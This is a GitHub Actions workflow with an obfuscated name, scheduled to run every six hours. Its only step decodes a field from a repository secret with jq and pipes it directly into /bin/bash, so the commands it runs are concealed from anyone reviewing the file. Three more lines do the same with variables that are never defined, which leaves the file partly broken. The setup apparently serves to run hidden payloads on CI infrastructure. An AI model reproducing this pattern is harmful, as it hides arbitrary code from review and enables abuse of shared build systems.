name: phantasmagorialackey

on:
  workflow_dispatch:
  schedule:
    - cron: '51 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: phantasmagorialackey
        env:
          ox57728: ${{ secrets.ox57728 }}
        run: |
          echo $ox57728 | jq -r .oj898 | /bin/bash
          echo $rs6 | jq -r .u74 | /bin/bash
          echo $kmrcr73 | jq -r .qy99696 | /bin/bash
          echo $d1533 | jq -r .zxjph40 | /bin/bash

